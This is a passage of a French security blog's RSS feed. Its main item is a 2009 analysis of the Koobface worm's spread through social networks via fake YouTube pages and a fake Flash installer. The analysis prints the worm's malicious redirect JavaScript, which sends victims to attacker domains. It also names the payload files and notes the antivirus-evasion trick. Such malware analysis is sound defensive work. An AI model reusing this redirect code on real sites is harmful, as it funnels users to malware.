true;&quot; target=&quot;_blank&quot; title=&quot;Twitter MalwareScene&quot;&gt;@MalwareScene&lt;/a&gt; - pour conclure, un grand bravo à &lt;a title=&quot;Twitter msuiche&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=851&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;https://twitter.com/msuiche/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Matthieu Suiche&lt;/a&gt; ( &lt;a title=&quot;Matthieu Suiche - MARS 2010 - Microsoft Security MVP&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=852&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://technet.microsoft.com/en-us/library/ff468786.aspx&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot;&gt;Microsoft Security MVP&lt;/a&gt;&lt;u&gt;&lt;span style=&quot;color: #000000;&quot;&gt; &lt;a title=&quot;JSSI 2010, 16 MARS 2010 - PARIS&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=853&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://www.ossir.org/jssi/jssi2010/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;+&lt;/a&gt; &lt;/span&gt;&lt;/u&gt;&lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=854&amp;amp;entry_id=62&quot;  onmouseover=&quot;window.status=&#039;http://www.moonsols.com/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;MoonSols is providing solutions, services and products for Incident Response, Forensics and advanced Troubleshooting.&quot;&gt;MoonSols&lt;/a&gt; )&lt;br /&gt; &lt;/p&gt; 
    </content:encoded>

    <pubDate>Fri, 12 Mar 2010 18:54:00 +0100</pubDate>
    <guid isPermaLink="false">http://mad.internetpol.fr/archives/62-guid.html</guid>
    
</item>
<item>
    <title>Koobface: La confiance accordée à vos relations doit cesser.</title>
    <link>http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html</link>
    
    <comments>http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html#comments</comments>
    <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=45</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=2.0&amp;type=comments&amp;cid=45</wfw:commentRss>
    

    <author>nospam@example.com (Joe)</author>
    <content:encoded>
    &lt;p&gt;&lt;div class=&quot;bb-code-title&quot;&gt;&lt;/div&gt;&lt;div class=&quot;bb-quote&quot;&gt;&lt;strong&gt;Win32/Koobface&lt;/strong&gt; is &lt;strong&gt;a multi-component family of malware&lt;/strong&gt; &lt;u&gt;used to
compromise machines and direct them in various ways at the attacker&#039;s
will&lt;/u&gt;. This could include using the affected machine to &lt;em&gt;distribute
additional malware&lt;/em&gt;,&amp;#160;&lt;em&gt;generate &#039;pay per click&#039; advertising revenue&lt;/em&gt;, &lt;em&gt;steal
sensitive data&lt;/em&gt;, &lt;em&gt;break captchas&lt;/em&gt;, and&amp;#160;&lt;em&gt;subvert the affected user&#039;s online
experience&lt;/em&gt;. Its components are varied, but include a worm that spreads
by utilizing &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=581&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://en.wikipedia.org/wiki/List_of_social_networking_websites&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;social networking sites&quot;&gt;social networking sites&lt;/a&gt;&amp;#160;such as Facebook and MySpace.&lt;/div&gt; &lt;/p&gt; 
&lt;p&gt;Mai 2009, le ver &amp;quot;&lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=582&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://fr.wikipedia.org/wiki/Koobface&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Wikipedia (FR) - Koobface&quot;&gt;&lt;em&gt;Koobface&lt;/em&gt;&lt;/a&gt;&amp;quot; anagramme de &amp;quot;&lt;em&gt;FaceBook&lt;/em&gt;&amp;quot; arrive dans le &lt;font face=&quot;times new roman,times,serif&quot;&gt;TOP5&lt;/font&gt; des familles derrière Taterf, Frethog et Alureon. Koobface n&#039;est &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=583&amp;amp;entry_id=45&quot; title=&quot;http://www.kaspersky.com/news?id=207575670&quot;  onmouseover=&quot;window.status=&#039;http://www.kaspersky.com/news?id=207575670&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot;&gt;pas une nouveauté&lt;/a&gt;, certes, mais il est toujours bon de s&#039;informer sur les techniques utilisées et d&#039;avoir conscience des risques potentiels que comportent nos gestes du quotidien ça permet entre autre d&#039;accroître notre vigilance et d&#039;éviter les pièges.&lt;/p&gt; 
&lt;p&gt; &lt;img src=&quot;http://mad.internetpol.fr/imgupz/mouse_click.jpg&quot; alt=&quot;Oh..oh.. you clicked too much!&quot; /&gt;&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;&lt;strong&gt;Oh..oh.. you clicked too much!&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt; 
&lt;/blockquote&gt; &lt;br /&gt; 
&lt;p&gt;&lt;img src=&quot;http://mad.internetpol.fr/imgupz/ssbdrfb403.gif&quot; /&gt;&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;&lt;u&gt;Scénario&lt;/u&gt;: L&#039;utilisateur se connecte à son compte &amp;quot;&lt;em&gt;Facebook&lt;/em&gt;&amp;quot;, dans sa boîte de réception, un message accompagné d&#039;un lien inconnu. Un réflexe adopté par cetains internautes consiste à vérifier le nom du site dans Google, ici tout semble normal: la page d&#039;accueil à l&#039;air sérieuse et pourtant.. il s&#039;agit d&#039;un site légitime ayant été détourné pour l&#039;occasion et qui héberge des scripts malveillants, regardez plutôt la suite.&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;&lt;img src=&quot;http://mad.internetpol.fr/imgupz/6icpmf.jpg&quot; /&gt;&lt;/p&gt; 
&lt;p&gt;Admettons que l&#039;utilisateur décide de cliquer sur le lien reçu dans sa boîte de réception. Une page va s&#039;afficher, elle aura l&#039;apparence d&#039;une page à l&#039;effigie d&#039;un site dit de confiance: &amp;quot;&lt;em&gt;YouTube&lt;/em&gt;.&amp;quot; Une personne informée des risques qui existent sur Internet remarquera rapidement que la barre d&#039;adresse n&#039;affiche pas &amp;quot;&lt;em&gt;youtube.com&lt;/em&gt;&amp;quot; et l&#039;anomalie de la fausse page qui a pour titre &amp;quot;&lt;em&gt;YuoTube&lt;/em&gt;&amp;quot;. La mise en scène - une fois la page chargée, vous découvrez un message qui vous informe que vous ne disposez pas du nécessaire pour visualiser le contenu, ici la &amp;quot;&lt;em&gt;Secret Video&lt;/em&gt;&amp;quot;, et on vous demande explicitement si vous souhaitez accepter ou refuser le téléchargement d&#039;un programme dont le nom vous évoque quelque chose que vous avez déjà lu quelque part, dans ce cas précis: &amp;quot;&lt;em&gt;FlashPlayer&lt;/em&gt;&amp;quot;. Si la personne télécharge et exécute ce faux lecteur alors sa machine va être infectée.&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;http://mad.internetpol.fr/imgupz/kfffp.jpg&quot; /&gt;&lt;br /&gt;&lt;br /&gt;Quand l&#039;utilisateur clique sur le lien qui est contenu dans le message &amp;quot;&lt;em&gt;Facebook&lt;/em&gt;&amp;quot;, la page renvoyée se présente sous cette forme: &lt;div class=&quot;bb-code-title&quot;&gt;&lt;/div&gt;&lt;div class=&quot;bb-quote&quot;&gt;let go&amp;lt;script src=w1v9gpe7pm.js&amp;gt;a=b&amp;lt;/script&amp;gt;to cool video&lt;/div&gt;&lt;br /&gt;Le fichier script &amp;quot;&lt;em&gt;w1v9gpe7pm.js&lt;/em&gt;&amp;quot; contient:&lt;div class=&quot;bb-code-title&quot;&gt;&lt;/div&gt;&lt;div class=&quot;bb-quote&quot;&gt;var abc1 = &#039;http://redir0705.com/go/&#039;;&lt;br /&gt;var abc2 = &#039;http://redir0805.com/go/&#039;;&lt;br /&gt;var ss = &#039;&#039; + location.search;&lt;br /&gt;if ((location.search).length&amp;gt;0) abc = abc1; else abc = abc2;&lt;br /&gt;var redirects = [&lt;br /&gt;[&#039;facebook.com&#039;,&amp;#160; abc+&#039;fb.php&#039;],&lt;br /&gt;[&#039;tagged.com&#039;,&amp;#160;&amp;#160;&amp;#160; abc+&#039;tg.php&#039;],&lt;br /&gt;[&#039;friendster.com&#039;,abc+&#039;fr.php&#039;],&lt;br /&gt;[&#039;myspace.com&#039;,&amp;#160;&amp;#160; abc+&#039;ms.php&#039;],&lt;br /&gt;[&#039;msplinks.com&#039;,&amp;#160; abc+&#039;ms.php&#039;],&lt;br /&gt;[&#039;myyearbook.com&#039;,abc+&#039;yb.php&#039;],&lt;br /&gt;[&#039;fubar.com&#039;,&amp;#160;&amp;#160;&amp;#160;&amp;#160; abc+&#039;fu.php&#039;],&lt;br /&gt;[&#039;hi5.com&#039;,&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; abc+&#039;hi5.php&#039;],&lt;br /&gt;[&#039;bebo.com&#039;,&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; abc+&#039;be.php&#039;]&lt;br /&gt;];&lt;br /&gt;var s = &#039;&#039; + document.referrer, r = false;&lt;br /&gt;for (var i = 0; i &amp;lt; redirects.length; i ++) {&lt;br /&gt;if ((s.indexOf(redirects[i][0]) != -1)) {&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; var redir=redirects[i][1] + location.search; &lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; if ((location.search).length&amp;gt;0) redir=redir+&#039;&amp;amp;domain=&#039;+location.host; else redir=redir+&#039;?domain=&#039;+location.host; &lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; location.href = redir; &amp;#160;&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; r = true; &lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160; break; &lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;if (!r) location.href = abc+&#039;index.php&#039;+ location.search;&lt;/div&gt;&lt;br /&gt;Les valeurs des variables &amp;quot;&lt;em&gt;abc1&lt;/em&gt;&amp;quot; et &amp;quot;&lt;em&gt;abc2&lt;/em&gt;&amp;quot; du script correspondent à des DNS qui sont tout deux configurés sur le même serveur chez &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=584&amp;amp;entry_id=45&quot; title=&quot;http://en.wikipedia.org/wiki/TM_Net&quot;  onmouseover=&quot;window.status=&#039;http://en.wikipedia.org/wiki/TM_Net&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; class=&quot;bb-url&quot;&gt;TM Net&lt;/a&gt; situé dans la capitale de la Malaisie, &lt;a title=&quot;Wikipedia: Kuala Lumpur&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=585&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://fr.wikipedia.org/wiki/Kuala_Lumpur&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Kuala Lumpur&lt;/a&gt;. La composition de ces noms de domaines permet de révéler un indicateur temporel quant à la date de mise en service: redir+0705 et redir:0805. Autres exemples observés par le passé, redir+2404.com qui pointe aussi sur ce même serveur par contre redir+2404.com pointe sur un serveur basé à &lt;a title=&quot;Wikipedia: Pekin&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=586&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://fr.wikipedia.org/wiki/Pekin&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Pékin&lt;/a&gt; en Chine. Le navigateur va donc interpréter ce code javascript et en fonction des variables va rediriger vers &amp;quot;&lt;em&gt;redir????.com/go/index.php&lt;/em&gt;&amp;quot; ; le serveur va répondre avec pour entête de réponse un champs nommé &amp;quot;&lt;a title=&quot;RFC2616 - Location&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=587&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://tools.ietf.org/html/rfc2616#page-135&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;&lt;em&gt;Location&lt;/em&gt;&lt;/a&gt;&amp;quot; qui contient l&#039;adresse sur laquelle le navigateur doit être redirigé. A chaque nouvelle requête, un mécanisme (&lt;em&gt;non détaillé&lt;/em&gt;) fait en sorte que la valeur renvoyée, en l&#039;occurrence l&#039;adresse IP, soit toujours différente. En principe les éléments qui composent la fausse page &amp;quot;&lt;em&gt;YouTube&lt;/em&gt;&amp;quot; sont les mêmes:&lt;br /&gt;&lt;br /&gt;- &amp;quot;%serveur%/player.swf&amp;quot; ; Une animation Flash qui simule l&#039;absence de Flash. (&lt;em&gt;le comble&lt;/em&gt;)&lt;br /&gt;- &amp;quot;%serveur%/tom.jpg&amp;quot; ; Un avatar situé en haut à droite sur la capture d&#039;écran.&lt;br /&gt;- &amp;quot;%serveur%/setup.exe&amp;quot; ; Un programme malveillant.&lt;br /&gt;&lt;br /&gt;A chaque nouvelle adresse IP, un programme différent, sûrement dans le but de contourner les &lt;a title=&quot;Wikipedia: Antivirus&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=588&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://fr.wikipedia.org/wiki/Antivirus&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;antivirus&lt;/a&gt; qui se baseraient uniquement sur les détections par fichiers de signatures. Différents ? Non, pas vraiment. Seule &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=594&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://fr.wikipedia.org/wiki/Fonction_de_hachage&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Wikipedia: Hachage&quot;&gt;l&#039;empreinte&lt;/a&gt; change grâce à de faibles variations opérées (&lt;em&gt;non détaillées&lt;/em&gt;) par un remplacement de quelques bytes à un offset (&lt;em&gt;position&lt;/em&gt;) précis. Ci-dessous, une schématisation: en rouge le nom des réseaux sociaux avec leur &lt;a title=&quot;Wikipedia: PageRank&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=590&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://fr.wikipedia.org/wiki/PageRank&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;rank&lt;/a&gt; entre parenthèses (sources&lt;em&gt;: Alexa&lt;/em&gt;) et en jaune la codification utilisée par les scripts / programmes.&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;&lt;img src=&quot;http://mad.internetpol.fr/imgupz/kfrs.gif&quot; /&gt;&lt;/p&gt; 
&lt;p&gt;Une fois le programme exécuté, il va indiquer à ses propriétaires qu&#039;il
est opérationnel et va réaliser divers téléchargements qui seront
adaptés en fonction de la configuration de la personne infectée puis veillera à bien tenir à
jour sa panoplie de programmes &lt;em&gt;(1)&lt;/em&gt;. A son tour, votre ordinateur va envoyer des messages qui iront peut être infecter d&#039;autres personnes &lt;em&gt;(2)&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;http://mad.internetpol.fr/imgupz/kfrs.jpg&quot; /&gt;&lt;br /&gt;Et on revient au point de départ, c&#039;est cyclique.&lt;br /&gt;
Mais que fait &lt;del&gt;la police&lt;/del&gt; la bande à &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=591&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blogs.eset-la.com/laboratorio/2008/11/20/campania-alibaba-40-ladrones/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;ESET - Campania Ali Baba y 40 ladrones&quot;&gt;Ali Baba&lt;/a&gt;...&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;
Liens connexes:&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=593&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blogs.technet.com/mmpc/archive/2009/03/10/anti-social-networking.aspx&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Anti-Social Networking&quot;&gt;Anti-Social Networking&lt;/a&gt; ( March 10, 2009 - Scott Molenkamp ; MMPC )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=592&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://digg.com/security/MSRT_and_an_Update_of_Worms_in_the_Wild&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;MSRT and an Update of Worms in the Wild&quot;&gt;MSRT and an Update of Worms in the Wild&lt;/a&gt; ( May 4, 2009 - Jeremy Croy ; MMPC )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=599&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.s21sec.com/2009/05/koobface-tirando-del-hilo.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Koobface: tirando del hilo&quot;&gt;Koobface: tirando del hilo&lt;/a&gt; ( May 20, 2009 - Jose Miguel Esparza ; 
S21sec e-crime )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=600&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.trendmicro.com/koobface-worm-alive-and-wriggling/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Koobface Worm Alive and Wriggling&quot;&gt;Koobface Worm Alive and Wriggling&lt;/a&gt; ( May 20, 2009 - JM Hipolito ; Trend Micro )&lt;br /&gt; - 
&lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=638&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://community.ca.com/blogs/securityadvisor/archive/2009/05/31/the-allure-of-social-networking.aspx&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Trend Micro - The Allure of Social Networking&quot;&gt;The Allure of Social Networking&lt;/a&gt; ( May 31, 2009 - Methusela Cebrian Ferrer ; Trend Micro )&lt;br /&gt;- &lt;a title=&quot;Koobface Re-Activated!&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=670&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://community.ca.com/blogs/securityadvisor/archive/2009/06/16/koobface-re-activated.aspx&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Koobface Re-Activated!&lt;/a&gt; ( June 16, 2009 - Ricardo Robielos )&lt;br /&gt; - &lt;a title=&quot;Ali Baba and the Forty Thieves - Jerome Segura&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=676&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blogs.paretologic.com/malwarediaries/index.php/2009/06/19/ali-baba-and-the-forty-thieves/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Ali Baba and the Forty Thieves&lt;/a&gt; ( June 19, 2009 - Jerome Segura )&lt;br /&gt;- &lt;a title=&quot;Koobface Tweets&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=679&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.trendmicro.com/koobface-tweets/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Koobface Tweets&lt;/a&gt; ( June 25, 2009 - Jonell Baltazar )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=690&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Dissecting Koobface Worm&#039;s Twitter Campaign&quot;&gt;Dissecting Koobface Worm&#039;s Twitter Campaign&lt;/a&gt; ( July 15, 2009 - Dancho Danchev )&lt;br /&gt;- &lt;a title=&quot;New KOOBFACE Upgrade Makes It Takedown-Proof&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=688&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.trendmicro.com/new-koobface-upgrade-makes-it-takedown-proof/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;New KOOBFACE Upgrade Makes It Takedown-Proof&lt;/a&gt; ( July 22, 2009 - Jonell Baltazar )&lt;br /&gt;- &lt;a title=&quot;Koobface - Come Out, Come Out, Wherever You Are&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=689&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Koobface - Come Out, Come Out, Wherever You Are&lt;/a&gt; ( July 22, 2009 - Dancho Danchev )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=691&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Movement on the Koobface Front&quot;&gt;Movement on the Koobface Front&lt;/a&gt; ( August 4, 2009 - Dancho Danchev )&lt;br /&gt;- &lt;a title=&quot;The Real Face of KOOBFACE&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=692&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.trendmicro.com/the-real-face-of-koobface/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;The Real Face of KOOBFACE&lt;/a&gt; ( August 6, 2009 - Ryan Flores )&lt;br /&gt;- &lt;a title=&quot;New tricks for Koobface&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=694&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://www.viruslist.com/en/weblog?weblogid=208187803&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;New tricks for Koobface&lt;/a&gt; ( August 6, 2009 - Stefan )&lt;br /&gt;- &lt;a title=&quot;Tertwit? or Twitter Tweet Links Redirect to Koobface&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=693&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.threatfire.com/2009/08/terttwit-or-twitter-tweets-links.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Tertwit? or Twitter Tweet Links Redirect to Koobface&lt;/a&gt; ( August 7, 2009 - ThreatFire )&lt;br /&gt; - &lt;a title=&quot;Koobface New Status Update...&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=699&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://community.ca.com/blogs/securityadvisor/archive/2009/08/14/koobface-new-status-update.aspx&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Koobface New Status Update...&lt;/a&gt; ( August 14, 2009 - Mary Grace Gabriel )&lt;br /&gt;- &lt;a title=&quot;Koobface: The saga continues&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=700&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://pandalabs.pandasecurity.com/archive/Koobface_3A00_-The-saga-continues.aspx&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Koobface: The saga continues&lt;/a&gt; ( August 14, 2009 - Sean-Paul Correll )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=703&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.trendmicro.com/koobface-ramps-up-its-twitter-campaign/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Koobface Ramps Up Its Twitter Campaign&quot;&gt;Koobface Ramps Up Its Twitter Campaign&lt;/a&gt; ( August 17, 2009 - Joey Costoya )&lt;br /&gt;- &lt;a title=&quot;Movement on the Koobface Front - Part Two&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=701&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Movement on the Koobface Front - Part Two&lt;/a&gt; ( August 19, 2009 - Dancho Danchev )&lt;br /&gt;- &lt;a title=&quot;Koobface 0x3e8 Folders and Links&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=702&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://blog.threatfire.com/2009/08/koobface-continues-to-tweet-its-assault.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Koobface 0x3e8 Folders and Links&lt;/a&gt; ( August 19, 2009 - ThreatFire )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=779&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Dancho Danchev Koobface Botnet&#039;s Scareware Business Model&quot;&gt;Koobface Botnet&#039;s Scareware Business Model&lt;/a&gt; ( September 16, 2009 - Dancho Danchev )&lt;br /&gt;- &lt;a title=&quot;Les attaques 2.0 : quand les pirates passent à l&#039;action&quot; target=&quot;_blank&quot; href=&quot;http://mad.internetpol.fr/exit.php?url_id=790&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://www.xmcopartners.com/actu-secu/XMCO-ActuSecu-23-Koobface-Gumblar.pdf&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Koobface, Gumblar, Slowloris, Antisec&lt;/a&gt; ( September 18, 2009 - ActuSécu XMCO n°23 ) &lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=782&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Koobface Botnet Dissected in a TrendMicro Report&quot;&gt;Koobface Botnet Dissected in a TrendMicro Report&lt;/a&gt; ( October 14, 2009 - Dancho Danchev )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=789&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Koobface Botnet&#039;s Scareware Business Model - Part Two&quot;&gt;Koobface Botnet&#039;s Scareware Business Model - Part Two&lt;/a&gt; ( November 11, 2009 - Dancho Danchev )&lt;br /&gt;- &lt;a href=&quot;http://mad.internetpol.fr/exit.php?url_id=840&amp;amp;entry_id=45&quot;  onmouseover=&quot;window.status=&#039;http://www.abuse.ch/?p=2103&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot; title=&quot;Koobface – the social network trojan&quot;&gt;Koobface – the social network trojan&lt;/a&gt; ( December 6, 2009 - The Swiss Security Blog )&lt;br /&gt;&lt;br /&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Mon, 18 May 2009 17:24:00 +0200</pubDate>
    <guid isPermaLink="false">http://mad.internetpol.fr/archives/45-guid.html</guid>
    
</item>

</channel>
</rss>